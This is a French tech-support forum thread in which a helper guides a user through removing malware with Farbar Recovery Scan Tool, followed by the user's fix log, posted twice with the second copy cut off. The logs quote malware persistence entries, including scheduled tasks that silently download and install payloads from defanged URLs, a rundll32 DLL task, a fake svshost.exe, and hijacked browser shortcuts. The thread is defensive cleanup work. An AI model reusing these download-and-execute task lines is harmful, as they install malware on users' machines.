Bonjour,
J'ai un message d'erreur qui apparait juste après le démarrage de Windows 8
cannot find script file D:\$RECYCLEBIN\Adobe.rar
j'ai déjà commencer la procédure de résolution avec Farbar Recovery Scan Tool et j'ai les trois rapports de scan FRST, Addition, Shortcut. comme indiquer sur le Tutorial Farbar et voilà les les liens générés par le site pjjoint.malekal.com
FRST
http://pjjoint.malekal.com/files.php?id ... g13x10i7x8
Addition
http://pjjoint.malekal.com/files.php?id ... h12j9m6y10
Shotrcut
http://pjjoint.malekal.com/files.php?id ... 9s5c10f8t7
Merci pour votre aide.
erreur cannot find script file D:\$RECYCLEBIN\Adobe.rar
Modérateurs : Mods Windows, Helper
- Messages : 31840
- Inscription : 28 févr. 2008 13:58
- Localisation : Breizhilienne
Re: erreur cannot find script file D:\$RECYCLEBIN\Adobe.rar
Bonjour,
Désinstalle si tu peux sinon continue:
- RunBooster (HKLM\...\RunBooster) (Version: 1.0.3 - SkyNET Corporation) <==== ATTENTION
- youndoo - Uninstall (HKLM-x32\...\{D87DF5A2-856B-4755-875C-91941519E6A8}) (Version: - ) <==== ATTENTION
Désinstalle si tu peux sinon continue:
- RunBooster (HKLM\...\RunBooster) (Version: 1.0.3 - SkyNET Corporation) <==== ATTENTION
- youndoo - Uninstall (HKLM-x32\...\{D87DF5A2-856B-4755-875C-91941519E6A8}) (Version: - ) <==== ATTENTION
- Ouvre le bloc-notes : Menu Démarrer / Tous les programmes / Accessoires et Bloc-Notes. (ou executer➫notepad)
Copie/colle dedans ce qui suit :
Code : Tout sélectionner
R2 [email protected]; C:\Windows\[email protected] [26112 2017-03-14] () [Fichier non signé] R2 RunBooster; C:\Program Files\RunBooster\RunBoosterService64.exe [286720 2017-03-14] (SkyNET Corporation) [Fichier non signé] <==== ATTENTION HKLM\...\Providers\q2cq9u9l: C:\Program Files (x86)\Stitught Adapter\local64spl.dll [306688 2017-03-14] () ShellExecuteHooks: Pas de nom - {522E1946-038B-11E7-BBEE-64006A5CFC23} - C:\Users\DELL\AppData\Roaming\Shjuch\Gahokclwos.dll [145408 2017-03-14] () Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Claire.lnk [2017-03-26] ShortcutTarget: Claire.lnk -> C:\$.RECYCLEBIN\svshost.exe (Microsoft Corporation) Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cleaner.lnk [2017-03-26] ShortcutTarget: Cleaner.lnk -> D:\$.RECYCLEBIN\svshost.exe (Microsoft Corporation) Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Help.lnk [2017-03-26] ShortcutTarget: Help.lnk -> C:\$.RECYCLEBIN\svshost.exe (Microsoft Corporation) Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Manual.lnk [2017-03-26] ShortcutTarget: Manual.lnk -> D:\$.RECYCLEBIN\svshost.exe (Microsoft Corporation) Task: {0BCA31F5-C84C-4EFB-853D-D8D4BF1A12D0} - System32\Tasks\Stitught Adapter => C:\Program Files (x86)\Grtase\xgerjaph.exe [2017-03-14] (Glarysoft Ltd) Task: {2FEF85B9-43EB-4464-A330-0BDBA8F96A7D} - System32\Tasks\PPI Update => C:\Windows\explorer.exe "hxxp://dazwindowsapps.xyz/download/index.php?mn=9995" <==== ATTENTION Task: {85D459E1-3408-4818-9A8A-113F4A7C39E4} - System32\Tasks\4748n28b39k4621 => Rundll32.exe "C:\ProgramData\4748n28b39k4621\4748n28b39k4621.dll",nbkeqk <==== ATTENTION Task: {9221C68B-37BD-4AAC-AC97-7FB76F3289C0} - System32\Tasks\Gruzitain => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD10JPVX-75JC3T0_WXV1E749UYHVE749UYHV&v=20170314 /q <==== ATTENTION Task: {F8CC5AC7-4C52-41E8-8FFE-6339EEF96579} - System32\Tasks\RunBoosterUpdateTask => C:\Program Files\RunBooster\RunBoosterUpdateTask64.exe [2017-03-14] (SkyNET Corporation) <==== ATTENTION Task: {FC960594-E2B1-4210-973B-7C2F374B4D13} - System32\Tasks\[email protected]\Windows63Professional => wmic ShortcutWithArgument: C:\Users\DELL\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://logiciens.com/go/14 ShortcutWithArgument: C:\Users\DELL\Desktop\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://logiciens.com/go/10 ShortcutWithArgument: C:\Users\DELL\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Internet Explorer.LNK -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://logiciens.com/go/10 2017-03-14 14:23 - 2017-03-14 14:23 - 00026112 _____ C:\Windows\[email protected] 2017-03-14 14:23 - 2017-03-14 14:23 - 00003612 _____ C:\Users\Public\Desktop\[email protected] 2017-03-14 14:23 - 2017-03-14 14:23 - 00000000 ____D C:\Windows\System32\Tasks\[email protected] 2017-03-14 14:23 - 2017-03-14 14:23 - 00000000 ____D C:\Users\DELL\AppData\Local\mpress 2017-03-14 14:15 - 2017-03-14 14:15 - 00037552 _____ (Basil) C:\Windows\system32\Drivers\WinDivert64.sys 2017-03-14 14:15 - 2017-03-14 14:15 - 00016708 _____ C:\Windows\System32\Tasks\4748n28b39k4621 2017-03-14 14:15 - 2017-03-14 14:15 - 00004272 _____ C:\Windows\System32\Tasks\RunBoosterUpdateTask 2017-03-14 14:15 - 2017-03-14 14:15 - 00000000 ___HD C:\ProgramData\4748n28b39k4621 2017-03-14 14:15 - 2017-03-14 14:15 - 00000000 ____D C:\Program Files\RunBooster 2017-03-14 14:14 - 2017-03-14 14:14 - 00140288 _____ C:\Users\DELL\AppData\Roaming\Installer.dat 2017-03-14 14:14 - 2017-03-14 14:14 - 00011568 _____ C:\Users\DELL\AppData\Roaming\InstallationConfiguration.xml 2017-03-14 14:13 - 2017-03-16 21:22 - 00000000 ____D C:\Program Files (x86)\Grtase 2017-03-14 14:13 - 2017-03-14 14:13 - 00006068 _____ C:\Windows\System32\Tasks\Stitught Adapter 2017-03-14 14:13 - 2017-03-14 14:13 - 00000000 ____D C:\Users\DELL\AppData\Roaming\Shjuch 2017-03-14 14:13 - 2017-03-14 14:13 - 00000000 ____D C:\Users\DELL\AppData\Local\Lzedom 2017-03-14 14:13 - 2017-03-14 14:13 - 00000000 ____D C:\Program Files (x86)\Stitught Adapter 2017-03-14 14:12 - 2017-03-14 14:12 - 00005074 _____ C:\Windows\System32\Tasks\Gruzitain 2017-03-14 14:11 - 2017-03-14 14:16 - 00000000 ____D C:\Program Files (x86)\Microsoft Toolkit Final 2017-03-14 14:11 - 2017-03-14 14:11 - 00003522 _____ C:\Windows\System32\Tasks\PPI Update C:\Program Files (x86)\Grtase C:\ProgramData\4748n28b39k4621 D:\$.RECYCLEBIN\svshost.exe EmptyTemp: - Menu Fichier / Enregistrer-sous
Place toi sur le bureau.
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clic sur Enregistrer - cela va créer un fichier fixlist.txt sur le bureau. - Ferme toutes les applications, y compris ton navigateur
- Double-clique sur FRST.exe
Sous Vista, Windows 7, 8,10, etc.... il faut lancer le fichier par clic-droit ➫ Exécuter en tant qu'administrateur
Sur le menu principal, clique une seule fois sur Corriger/Fix et patiente le temps de la correction
Un redémarrage peut être nécessaire (pas obligatoire). - L'outil va créer un rapport de correction Fixlog.txt. Poste ce rapport dans ta réponse avec ton commentaire si c'est mieux !
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
https://helicium.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Un p'tit Don à Angélique
Merci.
https://helicium.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Un p'tit Don à Angélique
Merci.Re: erreur cannot find script file D:\$RECYCLEBIN\Adobe.rar
je vous remercie, vraiment, mais il reste le message cannot find script file C:\$RECYCLEBIN\Adobe.rar
j`attend votre réponse.
voila le rapport fixlog.txt
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 15-03-2017
Exécuté par DELL (26-03-2017 22:10:00) Run:1
Exécuté depuis C:\Users\DELL\Desktop
Profils chargés: DELL (Profils disponibles: DELL)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
R2 [email protected]; C:\Windows\[email protected] [26112 2017-03-14] () [Fichier non signé]
R2 RunBooster; C:\Program Files\RunBooster\RunBoosterService64.exe [286720 2017-03-14] (SkyNET Corporation) [Fichier non signé] <==== ATTENTION
HKLM\...\Providers\q2cq9u9l: C:\Program Files (x86)\Stitught Adapter\local64spl.dll [306688 2017-03-14] ()
ShellExecuteHooks: Pas de nom - {522E1946-038B-11E7-BBEE-64006A5CFC23} - C:\Users\DELL\AppData\Roaming\Shjuch\Gahokclwos.dll [145408 2017-03-14] ()
Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Claire.lnk [2017-03-26]
ShortcutTarget: Claire.lnk -> C:\$.RECYCLEBIN\svshost.exe (Microsoft Corporation)
Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cleaner.lnk [2017-03-26]
ShortcutTarget: Cleaner.lnk -> D:\$.RECYCLEBIN\svshost.exe (Microsoft Corporation)
Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Help.lnk [2017-03-26]
ShortcutTarget: Help.lnk -> C:\$.RECYCLEBIN\svshost.exe (Microsoft Corporation)
Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Manual.lnk [2017-03-26]
ShortcutTarget: Manual.lnk -> D:\$.RECYCLEBIN\svshost.exe (Microsoft Corporation)
Task: {0BCA31F5-C84C-4EFB-853D-D8D4BF1A12D0} - System32\Tasks\Stitught Adapter => C:\Program Files (x86)\Grtase\xgerjaph.exe [2017-03-14] (Glarysoft Ltd)
Task: {2FEF85B9-43EB-4464-A330-0BDBA8F96A7D} - System32\Tasks\PPI Update => C:\Windows\explorer.exe "hxxp://dazwindowsapps.xyz/download/index.php?mn=9995" <==== ATTENTION
Task: {85D459E1-3408-4818-9A8A-113F4A7C39E4} - System32\Tasks\4748n28b39k4621 => Rundll32.exe "C:\ProgramData\4748n28b39k4621\4748n28b39k4621.dll",nbkeqk <==== ATTENTION
Task: {9221C68B-37BD-4AAC-AC97-7FB76F3289C0} - System32\Tasks\Gruzitain => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD10JPVX-75JC3T0_WXV1E749UYHVE749UYHV&v=20170314 /q <==== ATTENTION
Task: {F8CC5AC7-4C52-41E8-8FFE-6339EEF96579} - System32\Tasks\RunBoosterUpdateTask => C:\Program Files\RunBooster\RunBoosterUpdateTask64.exe [2017-03-14] (SkyNET Corporation) <==== ATTENTION
Task: {FC960594-E2B1-4210-973B-7C2F374B4D13} - System32\Tasks\[email protected]\Windows63Professional => wmic
ShortcutWithArgument: C:\Users\DELL\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://logiciens.com/go/14
ShortcutWithArgument: C:\Users\DELL\Desktop\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://logiciens.com/go/10
ShortcutWithArgument: C:\Users\DELL\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Internet Explorer.LNK -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://logiciens.com/go/10
2017-03-14 14:23 - 2017-03-14 14:23 - 00026112 _____ C:\Windows\[email protected]
2017-03-14 14:23 - 2017-03-14 14:23 - 00003612 _____ C:\Users\Public\Desktop\[email protected]
2017-03-14 14:23 - 2017-03-14 14:23 - 00000000 ____D C:\Windows\System32\Tasks\[email protected]
2017-03-14 14:23 - 2017-03-14 14:23 - 00000000 ____D C:\Users\DELL\AppData\Local\mpress
2017-03-14 14:15 - 2017-03-14 14:15 - 00037552 _____ (Basil) C:\Windows\system32\Drivers\WinDivert64.sys
2017-03-14 14:15 - 2017-03-14 14:15 - 00016708 _____ C:\Windows\System32\Tasks\4748n28b39k4621
2017-03-14 14:15 - 2017-03-14 14:15 - 00004272 _____ C:\Windows\System32\Tasks\RunBoosterUpdateTask
2017-03-14 14:15 - 2017-03-14 14:15 - 00000000 ___HD C:\ProgramData\4748n28b39k4621
2017-03-14 14:15 - 2017-03-14 14:15 - 00000000 ____D C:\Program Files\RunBooster
2017-03-14 14:14 - 2017-03-14 14:14 - 00140288 _____ C:\Users\DELL\AppData\Roaming\Installer.dat
2017-03-14 14:14 - 2017-03-14 14:14 - 00011568 _____ C:\Users\DELL\AppData\Roaming\InstallationConfiguration.xml
2017-03-14 14:13 - 2017-03-16 21:22 - 00000000 ____D C:\Program Files (x86)\Grtase
2017-03-14 14:13 - 2017-03-14 14:13 - 00006068 _____ C:\Windows\System32\Tasks\Stitught Adapter
2017-03-14 14:13 - 2017-03-14 14:13 - 00000000 ____D C:\Users\DELL\AppData\Roaming\Shjuch
2017-03-14 14:13 - 2017-03-14 14:13 - 00000000 ____D C:\Users\DELL\AppData\Local\Lzedom
2017-03-14 14:13 - 2017-03-14 14:13 - 00000000 ____D C:\Program Files (x86)\Stitught Adapter
2017-03-14 14:12 - 2017-03-14 14:12 - 00005074 _____ C:\Windows\System32\Tasks\Gruzitain
2017-03-14 14:11 - 2017-03-14 14:16 - 00000000 ____D C:\Program Files (x86)\Microsoft Toolkit Final
2017-03-14 14:11 - 2017-03-14 14:11 - 00003522 _____ C:\Windows\System32\Tasks\PPI Update
C:\Program Files (x86)\Grtase
C:\ProgramData\4748n28b39k4621
D:\$.RECYCLEBIN\svshost.exe
EmptyTemp:
*****************
[email protected] => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\[email protected] => clé supprimé(es) avec succès
[email protected] => service supprimé(es) avec succès
RunBooster => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\RunBooster => clé supprimé(es) avec succès
RunBooster => service supprimé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\q2cq9u9l => clé supprimé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\\order q2cq9u9l => supprimé(es) avec succès
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{522E1946-038B-11E7-BBEE-64006A5CFC23} => valeur supprimé(es) avec succès
HKCR\CLSID\{522E1946-038B-11E7-BBEE-64006A5CFC23} => clé non trouvé(e).
C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Claire.lnk => déplacé(es) avec succès
C:\$.RECYCLEBIN\svshost.exe => déplacé(es) avec succès
C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cleaner.lnk => déplacé(es) avec succès
Impossible de déplacer "D:\$.RECYCLEBIN\svshost.exe" => Planifié pour déplacement au redémarrage.
C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Help.lnk => déplacé(es) avec succès
C:\$.RECYCLEBIN\svshost.exe => non trouvé(e).
C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Manual.lnk => déplacé(es) avec succès
Impossible de déplacer "D:\$.RECYCLEBIN\svshost.exe" => Planifié pour déplacement au redémarrage.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0BCA31F5-C84C-4EFB-853D-D8D4BF1A12D0} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0BCA31F5-C84C-4EFB-853D-D8D4BF1A12D0} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\Stitught Adapter => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Stitught Adapter => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2FEF85B9-43EB-4464-A330-0BDBA8F96A7D} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2FEF85B9-43EB-4464-A330-0BDBA8F96A7D} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\PPI Update => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PPI Update => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{85D459E1-3408-4818-9A8A-113F4A7C39E4} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{85D459E1-3408-4818-9A8A-113F4A7C39E4} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\4748n28b39k4621 => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\4748n28b39k4621 => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9221C68B-37BD-4AAC-AC97-7FB76F3289C0} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9221C68B-37BD-4AAC-AC97-7FB76F3289C0} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\Gruzitain => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Gruzitain => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{F8CC5AC7-4C52-41E8-8FFE-6339EEF96579} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F8CC5AC7-4C52-41E8-8FFE-6339EEF96579} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\RunBoosterUpdateTask => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RunBoosterUpdateTask => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FC960594-E2B1-4210-973B-7C2F374B4D13} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FC960594-E2B1-4210-973B-7C2F374B4D13} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\[email protected]\Windows63Professional => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\[email protected]\Windows63Professional => clé supprimé(es) avec succès
C:\Users\DELL\Desktop\Google Chrome.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\DELL\Desktop\Internet Explorer.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\DELL\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Internet Explorer.LNK => Raccourci argument supprimé(es) avec succès.
C:\Windows\[email protected] => déplacé(es) avec succès
C:\Users\Public\Desktop\[email protected] => déplacé(es) avec succès
C:\Windows\System32\Tasks\[email protected] => déplacé(es) avec succès
C:\Users\DELL\AppData\Local\mpress => déplacé(es) avec succès
C:\Windows\system32\Drivers\WinDivert64.sys => déplacé(es) avec succès
"C:\Windows\System32\Tasks\4748n28b39k4621" => non trouvé(e).
"C:\Windows\System32\Tasks\RunBoosterUpdateTask" => non trouvé(e).
C:\ProgramData\4748n28b39k4621 => déplacé(es) avec succès
C:\Program Files\RunBooster => déplacé(es) avec succès
C:\Users\DELL\AppData\Roaming\Installer.dat => déplacé(es) avec succès
C:\Users\DELL\AppData\Roaming\InstallationConfiguration.xml => déplacé(es) avec succès
C:\Program Files (x86)\Grtase => déplacé(es) avec succès
"C:\Windows\System32\Tasks\Stitught Adapter" => non trouvé(e).
C:\Users\DELL\AppData\Roaming\Shjuch => déplacé(es) avec succès
C:\Users\DELL\AppData\Local\Lzedom => déplacé(es) avec succès
C:\Program Files (x86)\Stitught Adapter => déplacé(es) avec succès
"C:\Windows\System32\Tasks\Gruzitain" => non trouvé(e).
C:\Program Files (x86)\Microsoft Toolkit Final => déplacé(es) avec succès
"C:\Windows\System32\Tasks\PPI Update" => non trouvé(e).
"C:\Program Files (x86)\Grtase" => non trouvé(e).
"C:\ProgramData\4748n28b39k4621" => non trouvé(e).
Impossible de déplacer "D:\$.RECYCLEBIN\svshost.exe" => Planifié pour déplacement au redémarrage.
=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 29581391 B
Java, Flash, Steam htmlcache => 492 B
Windows/system/drivers => 444966140 B
Edge => 0 B
Chrome => 539570400 B
Firefox => 0 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 127673 B
NetworkService => 13802 B
DELL => 1621522160 B
RecycleBin => 2974543901 B
EmptyTemp: => 5.2 GB données temporaires supprimées.
================================
Résultats du déplacement planifié des fichiers (Mode d'amorçage: Normal) (Date&Heure: 26-03-2017 22:13:09)
D:\$.RECYCLEBIN\svshost.exe => déplacé(es) avec succès
D:\$.RECYCLEBIN\svshost.exe => a été déplacé(e) avec succès
D:\$.RECYCLEBIN\svshost.exe => a été déplacé(e) avec succès
==== Fin de Fixlog 22:13:10 ====
j`attend votre réponse.
voila le rapport fixlog.txt
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 15-03-2017
Exécuté par DELL (26-03-2017 22:10:00) Run:1
Exécuté depuis C:\Users\DELL\Desktop
Profils chargés: DELL (Profils disponibles: DELL)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
R2 [email protected]; C:\Windows\[email protected] [26112 2017-03-14] () [Fichier non signé]
R2 RunBooster; C:\Program Files\RunBooster\RunBoosterService64.exe [286720 2017-03-14] (SkyNET Corporation) [Fichier non signé] <==== ATTENTION
HKLM\...\Providers\q2cq9u9l: C:\Program Files (x86)\Stitught Adapter\local64spl.dll [306688 2017-03-14] ()
ShellExecuteHooks: Pas de nom - {522E1946-038B-11E7-BBEE-64006A5CFC23} - C:\Users\DELL\AppData\Roaming\Shjuch\Gahokclwos.dll [145408 2017-03-14] ()
Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Claire.lnk [2017-03-26]
ShortcutTarget: Claire.lnk -> C:\$.RECYCLEBIN\svshost.exe (Microsoft Corporation)
Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cleaner.lnk [2017-03-26]
ShortcutTarget: Cleaner.lnk -> D:\$.RECYCLEBIN\svshost.exe (Microsoft Corporation)
Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Help.lnk [2017-03-26]
ShortcutTarget: Help.lnk -> C:\$.RECYCLEBIN\svshost.exe (Microsoft Corporation)
Startup: C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Manual.lnk [2017-03-26]
ShortcutTarget: Manual.lnk -> D:\$.RECYCLEBIN\svshost.exe (Microsoft Corporation)
Task: {0BCA31F5-C84C-4EFB-853D-D8D4BF1A12D0} - System32\Tasks\Stitught Adapter => C:\Program Files (x86)\Grtase\xgerjaph.exe [2017-03-14] (Glarysoft Ltd)
Task: {2FEF85B9-43EB-4464-A330-0BDBA8F96A7D} - System32\Tasks\PPI Update => C:\Windows\explorer.exe "hxxp://dazwindowsapps.xyz/download/index.php?mn=9995" <==== ATTENTION
Task: {85D459E1-3408-4818-9A8A-113F4A7C39E4} - System32\Tasks\4748n28b39k4621 => Rundll32.exe "C:\ProgramData\4748n28b39k4621\4748n28b39k4621.dll",nbkeqk <==== ATTENTION
Task: {9221C68B-37BD-4AAC-AC97-7FB76F3289C0} - System32\Tasks\Gruzitain => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD10JPVX-75JC3T0_WXV1E749UYHVE749UYHV&v=20170314 /q <==== ATTENTION
Task: {F8CC5AC7-4C52-41E8-8FFE-6339EEF96579} - System32\Tasks\RunBoosterUpdateTask => C:\Program Files\RunBooster\RunBoosterUpdateTask64.exe [2017-03-14] (SkyNET Corporation) <==== ATTENTION
Task: {FC960594-E2B1-4210-973B-7C2F374B4D13} - System32\Tasks\[email protected]\Windows63Professional => wmic
ShortcutWithArgument: C:\Users\DELL\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://logiciens.com/go/14
ShortcutWithArgument: C:\Users\DELL\Desktop\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://logiciens.com/go/10
ShortcutWithArgument: C:\Users\DELL\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Internet Explorer.LNK -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://logiciens.com/go/10
2017-03-14 14:23 - 2017-03-14 14:23 - 00026112 _____ C:\Windows\[email protected]
2017-03-14 14:23 - 2017-03-14 14:23 - 00003612 _____ C:\Users\Public\Desktop\[email protected]
2017-03-14 14:23 - 2017-03-14 14:23 - 00000000 ____D C:\Windows\System32\Tasks\[email protected]
2017-03-14 14:23 - 2017-03-14 14:23 - 00000000 ____D C:\Users\DELL\AppData\Local\mpress
2017-03-14 14:15 - 2017-03-14 14:15 - 00037552 _____ (Basil) C:\Windows\system32\Drivers\WinDivert64.sys
2017-03-14 14:15 - 2017-03-14 14:15 - 00016708 _____ C:\Windows\System32\Tasks\4748n28b39k4621
2017-03-14 14:15 - 2017-03-14 14:15 - 00004272 _____ C:\Windows\System32\Tasks\RunBoosterUpdateTask
2017-03-14 14:15 - 2017-03-14 14:15 - 00000000 ___HD C:\ProgramData\4748n28b39k4621
2017-03-14 14:15 - 2017-03-14 14:15 - 00000000 ____D C:\Program Files\RunBooster
2017-03-14 14:14 - 2017-03-14 14:14 - 00140288 _____ C:\Users\DELL\AppData\Roaming\Installer.dat
2017-03-14 14:14 - 2017-03-14 14:14 - 00011568 _____ C:\Users\DELL\AppData\Roaming\InstallationConfiguration.xml
2017-03-14 14:13 - 2017-03-16 21:22 - 00000000 ____D C:\Program Files (x86)\Grtase
2017-03-14 14:13 - 2017-03-14 14:13 - 00006068 _____ C:\Windows\System32\Tasks\Stitught Adapter
2017-03-14 14:13 - 2017-03-14 14:13 - 00000000 ____D C:\Users\DELL\AppData\Roaming\Shjuch
2017-03-14 14:13 - 2017-03-14 14:13 - 00000000 ____D C:\Users\DELL\AppData\Local\Lzedom
2017-03-14 14:13 - 2017-03-14 14:13 - 00000000 ____D C:\Program Files (x86)\Stitught Adapter
2017-03-14 14:12 - 2017-03-14 14:12 - 00005074 _____ C:\Windows\System32\Tasks\Gruzitain
2017-03-14 14:11 - 2017-03-14 14:16 - 00000000 ____D C:\Program Files (x86)\Microsoft Toolkit Final
2017-03-14 14:11 - 2017-03-14 14:11 - 00003522 _____ C:\Windows\System32\Tasks\PPI Update
C:\Program Files (x86)\Grtase
C:\ProgramData\4748n28b39k4621
D:\$.RECYCLEBIN\svshost.exe
EmptyTemp:
*****************
[email protected] => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\[email protected] => clé supprimé(es) avec succès
[email protected] => service supprimé(es) avec succès
RunBooster => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\RunBooster => clé supprimé(es) avec succès
RunBooster => service supprimé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\q2cq9u9l => clé supprimé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\\order q2cq9u9l => supprimé(es) avec succès
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{522E1946-038B-11E7-BBEE-64006A5CFC23} => valeur supprimé(es) avec succès
HKCR\CLSID\{522E1946-038B-11E7-BBEE-64006A5CFC23} => clé non trouvé(e).
C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Claire.lnk => déplacé(es) avec succès
C:\$.RECYCLEBIN\svshost.exe => déplacé(es) avec succès
C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cleaner.lnk => déplacé(es) avec succès
Impossible de déplacer "D:\$.RECYCLEBIN\svshost.exe" => Planifié pour déplacement au redémarrage.
C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Help.lnk => déplacé(es) avec succès
C:\$.RECYCLEBIN\svshost.exe => non trouvé(e).
C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Manual.lnk => déplacé(es) avec succès
Impossible de déplacer "D:\$.RECYCLEBIN\svshost.exe" => Planifié pour déplacement au redémarrage.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0BCA31F5-C84C-4EFB-853D-D8D4BF1A12D0} => clé supprimé(es) avec succès
